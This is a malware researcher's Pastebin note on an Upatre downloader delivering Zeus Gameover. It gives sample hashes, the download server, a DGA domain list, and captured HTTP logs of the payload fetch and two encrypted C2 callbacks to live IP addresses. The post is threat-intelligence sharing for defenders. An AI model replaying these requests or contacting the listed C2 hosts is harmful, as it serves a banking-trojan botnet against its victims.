Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMusDie!
- // Case: Upatre downloading Zeus Gameover (GMO)
- // Detected new alive (front end) CNC in 192.210.237.212
- // @unixfreaxjp /malware/checkdomains]$ date
- Wed Mar 26 19:52:24 JST 2014
- Upatre Sample: https://www.virustotal.com/en/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395828639/
- ZGMO sample: https://www.virustotal.com/en/file/e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524/analysis/1395830427/
- ZGMO Polymorphic drop: https://www.virustotal.com/en/file/4f1f5242b6cf599220bcf642c7a3bd2f42739445bef5bf13b30c67ebbeeb5d64/analysis/1395830452/
- ZGMO Necurs rootkit: https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
- // Upatre downloads from 91.103.220.155
- ( Wed Mar 26 19:26:33 JST 2014|91.103.220.155|no-dns.dataflame.co.uk.|29550 | 91.103.216.0/21 | SIMPLYTRANSIT | GB | DATAFLAME.CO.UK | DATAFLAME INTERNET SERVICES LTD )
- GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1
- Accept: text/*, application/*
- User-Agent: Updates downloader
- Host: premiercrufinewine.co.uk
- Cache-Control: no-cache
- HTTP/1.1 200 OK
- Date: Wed, 26 Mar 2014 09:57:22 GMT
- Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_qos/10.10
- Last-Modified: Fri, 21 Mar 2014 06:12:05 GMT
- ETag: "e1314-79e34-4f517c3d02e2a"
- Accept-Ranges: bytes
- Content-Length: 499252
- Content-Type: text/plain
- ZZP.A. (REDACTED)
- // ZGMO DGA:
- hyvguwdisgtkfjvpzrshijmjmngu.info
- vsskfudeqsorzhhawghonhknp.ru
- zttwocyqkpdegqgiytvcxphhy.biz
- mftodqwheaiozkbzduwjzydwkonv.com
- pvdlcaxlflgavwmfzvgcqhafm.com
- swskvaylddwvkhursjhbyx.org
- rccicerggqhswvgwolryhvsgqwsxvs.net
- aulbbiwslxpvvphxnjij.biz
- uoxztdipjzppjdpyttxcjrdiz.ru
- zzgezdvwtwyhypfqhytcjraygqp.com
- gugquwcumizhgyibbaqobajfvolbh.info
- // ZGMO Callbacks ALIVE domains:
- aulbbiwslxpvvphxnjij.biz,50.116.4.71, DNS1.REGISTRAR-SERVERS.COM
- mftodqwheaiozkbzduwjzydwkonv.com,192.210.237.212,DNS1.REGISTRAR-SERVERS.COM
- // ZGMO Callbacks:
- // callback 1 to 50.116.4.71
- ( Wed Mar 26 19:24:28 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE )
- POST /write HTTP/1.1
- Host: default
- Accept-Encoding:
- Connection: close
- Content-Length: 328
- X-ID: 5555
- .3....l.u.\...v.Y%.kH.......U.v.a.V..\..Pb.%....e..
- .....'...'...Ve.F\e.E'b.2T`.AVe.G]g.4R..E#a.@Rl.A]e.
- f.................?.h.\N.......}.e.Xg...............
- Ud.E2..h.......!...!...io.vhj.vhU.vhU.vhU.vhU.vhU.vh
- U.vhk...............jo.Gk`.vk ..9E.vkm.............lW
- .|nU.vmU.qio.......'...'...nU.voT.vnU..jT..
- .U.voU.voU.voU.voU...U.
- // callback 2 to 192.210.237.212
- ( Wed Mar 26 19:25:04 JST 2014|192.210.237.212|host.colocrossing.com.|36352 | 192.210.236.0/22 | AS-COLOCROSSING | US | NWNX.NET | NEW WAVE NETCONNECT LLC )
- POST /write HTTP/1.1
- Host: default
- Accept-Encoding:
- Connection: close
- Content-Length: 328
- X-ID: 5555
- .uj......Z..Lp=..N.H..............r}.E..!J..F#re.......
- '...'...V...\...'...T...V...]...R...#...R...]..f.......
- .........:U.h.6.._...Z......g...............U...2..h...
- ....!...!...i...h...h...h...h...h...h...h...hk.........
- ......jih.k1..kf.Z9...km.............l...n...m...io....
- ...'...'...n...o...n..hj..t....o...o...o...o..t...
- #MalwareMstDie!!
Add Comment
Please, Sign In to add comment